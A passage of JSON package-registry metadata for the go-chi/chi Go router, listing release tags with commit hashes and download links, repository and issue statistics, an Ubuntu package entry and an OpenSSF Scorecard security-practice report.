es/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.194Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/golang-github-go-chi-chi?arch=source\u0026distro=ubuntu-23.10\u0026repository_url=https://launchpad.net/ubuntu/mantic","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/golang-github-go-chi-chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/golang-github-go-chi-chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/golang-github-go-chi-chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/golang-github-go-chi-chi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/golang-github-go-chi-chi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/golang-github-go-chi-chi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/golang-github-go-chi-chi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/golang-github-go-chi-chi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages/golang-github-go-chi-chi/codemeta","maintainers":[],"registry":{"name":"ubuntu-23.10","url":"https://launchpad.net/ubuntu/mantic","ecosystem":"ubuntu","default":false,"packages_count":36642,"maintainers_count":0,"namespaces_count":4,"keywords_count":2213,"github":"ubuntu","metadata":{"codename":"mantic","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":891},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.636Z","updated_at":"2026-08-10T05:07:58.402Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.10/namespaces"}},{"id":14415565,"name":"github.com/go-chi/chi/v5/middleware","ecosystem":"go","description":"","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"github.com/go-chi/chi/v5","versions_count":22,"first_release_published_at":"2026-05-09T20:37:01.667Z","latest_release_published_at":"2026-05-09T20:37:01.667Z","latest_release_number":"v5.2.5","last_synced_at":"2026-08-13T02:27:21.468Z","created_at":"2026-05-09T20:36:29.385Z","updated_at":"2026-08-13T02:27:21.468Z","registry_url":"https://pkg.go.dev/github.com/go-chi/chi/v5/middleware","install_command":"go get github.com/go-chi/chi/v5/middleware","documentation_url":"https://pkg.go.dev/github.com/go-chi/chi/v5/middleware#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8